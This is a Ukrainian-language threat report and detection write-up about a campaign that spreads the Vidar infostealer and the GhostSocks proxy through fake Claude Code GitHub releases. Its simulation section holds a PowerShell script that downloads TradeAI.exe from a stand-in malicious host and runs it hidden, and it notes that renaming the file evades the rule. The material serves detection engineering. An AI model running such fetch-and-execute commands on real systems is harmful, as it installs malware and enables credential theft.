Claude Code Lures перетворює релізи GitHub на канал доставки шкідливого ПЗ
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Злочинці швидко використали неправильно налаштований пакет npm, який випадково відкрив вихідний код Claude Code від Anthropic. Вони створили фальшиві репозиторії GitHub, що розміщують троянські «релізи» у форматі 7z, які встановлюють завантажувач, розроблений на Rust. Після виконання, дроппер встановлює інфостілер Vidar разом із SOCKS5-проксі GhostSocks для здійснення крадіжок та прихованого доступу.
Розслідування
Розслідування виявило операцію зі змінним приманками, активну з лютого 2026 року, яка покладається на короткострокові облікові записи GitHub для публікації шкідливих артефактів релізу. Серед комплексу приманок жертви отримують одне й те саме навантаження TradeAI.exe, яке розшифровує вбудовані URL C2, перевіряє аналітичні перевірки та розгортає як Vidar, так і GhostSocks. Виявлення C2 здійснюється через dead-drop резолвери, розміщені на Steam і Telegram, що допомагає кампанії швидко оновлювати інфраструктуру.
Пом’якшення
Організації повинні обмежити встановлення інструментів AI перевіреними джерелами, блокувати відомі шкідливі посилання на GitHub релізи та на відповідні домени C2, а також уважно стежити за поведінкою, що свідчить про крадіжку облікових даних. Додайте виявлення на кінцевій точці для дропперів, скомпільованих на Rust, і типових шаблонів виконання Vidar/GhostSocks. Посильте покриття для сигналів уникнення пісочниці та обмежте підозріле виконання сценаріїв (включно з аномальною активністю PowerShell), які можуть бути використані для підготовки або наступних дій.
Реагування
У разі виявлення ізолюйте кінцеву точку, збережіть шкідливий виконуваний файл та пов’язаний з ним архів 7z, і шукайте артефакти Vidar і GhostSocks на всіх хостах і мережах. Блокуйте ідентифіковані URL pastebin та snippet.host і негайно відкликайте будь-які зламані облікові дані. Виконайте повну оцінку компрометації облікових даних, потім скиньте привілейовані облікові записи та анулюйте токени/сесії, щоб запобігти повторному використанню.
Поточний потік атаки
Виявлення
Підозрілі зміни налаштувань Windows Defender (через powershell)
Переглянути
Підозрілі рядки PowerShell (через PowerShell)
Переглянути
Можливі індикатори обфускації PowerShell (через powershell)
Переглянути
Можливі точки зберігання [ASEPs – ПЗ/NTUSER Hive] (через registry_event)
Переглянути
IOCs (DestinationIP) для виявлення: Штучний інтелект (AI) Зброїзуючи Сигнали Довіри: Claude Code Lures and GitHub Release Payloads
Переглянути
IOCs (SourceIP) для виявлення: Штучний інтелект (AI) Зброїзуючи Сигнали Довіри: Claude Code Lures and GitHub Release Payloads
Переглянути
Виявлення дропперів шкідливого програмного забезпечення Vidar і GhostSocks [Створення процесу Windows]
Переглянути
Запуск симуляції
Передумова: Телеметрія та базова перевірка перед польотом повинні пройти.
Пояснення: Цей розділ детально описує точну реалізацію техніки супротивника (TTP), розробленої для запуску правила виявлення. Команди та сценарій обов’язково мають безпосередньо відображати виявлені TTP і створити саме ту телеметрію, на яку розрахована логіка виявлення.
-
Розповідь про атаку і команди:
Супротивник отримує фішинг-лист (T1566.002) із шкідливим посиланням, яке вказує на зламаний репозиторій GitHub, що міститьTradeAI.exe. Жертва клацає на посилання, яке запускає PowerShell у прихованому вікні. Скрипт завантажує дроппер у тимчасову директорію, виконує його, і дроппер надалі встановлює стілер Vidar та проксі GhostSocks (T1027, T1090.003). -
Сценарій тестування регресії:
# ------------------------------------------------- # Симулювати виконання дроппера TradeAI.exe # ------------------------------------------------- $url = "http://malicious.example.com/TradeAI.exe" $outPath = "$env:TEMPTradeAI.exe" # Завантажити дроппер (імітувати поведінку реального нападника) Invoke-WebRequest -Uri $url -OutFile $outPath -UseBasicParsing # Безшумно виконати дроппер Start-Process -FilePath $outPath -WindowStyle Hidden # OPTIONAL: почекайте кілька секунд, щоб дозволити будь-яким дочірним процесам з'явитися Start-Sleep -Seconds 5 # ------------------------------------------------- -
Команди очищення:
# Видалити завантажений дроппер і всі тимчасові артефакти $outPath = "$env:TEMPTradeAI.exe" if (Test-Path $outPath) { Remove-Item $outPath -Force } # (Якщо дроппер створив додаткові файли, знайдіть і видаліть їх за необхідності) # Приклад: видалити відому директорію з навантаженням $payloadDir = "$env:APPDATAVidar" if (Test-Path $payloadDir) { Remove-Item $payloadDir -Recurse -Force }
Перевірка та очікуваний результат
- Очікувана SIEM сигналізація: Після запуску сценарію регресії, SIEM повинен згенерувати сигналізацію, де
Зображеннязакінчується наTradeAI.exe(orClaudeCode_x64.exe). Заголовок сигналізації відповідатиме правилузаголовокполе. - Тест на уникнення: Перейменуйте завантажений бінарний файл у
TradeAI_renamed.exeі повторно запустіть сценарій. Ніякої сигналізації не повинно бути, що підтверджує залежність правила від статичних імен файлів.
Рекомендації з посилення безпеки
- Додати індикатори гешування: Включіть SHA‑256 хеші відомих шкідливих дропперів у правило (або в окреме правило, засноване на хешах).
- Розширити охоплення: Розширити виявлення для моніторингу виконання невідомих бінарних файлів, запущених із нетипових місць (наприклад,
%TEMP%,%APPDATA%). - Кореляція поведінки: Корелюйте створення процесу з наступними мережевими підключеннями до відомих доменів C2 GhostSocks (T1090.003) і записами файлів відомих компонентів Vidar.
- Політика виконання на кінцевій точці: Розгорніть AppLocker або Windows Defender Application Control, щоб блокувати виконання невписаних бінарних файлів із директорій, доступних для запису користувача.
Кінець звіту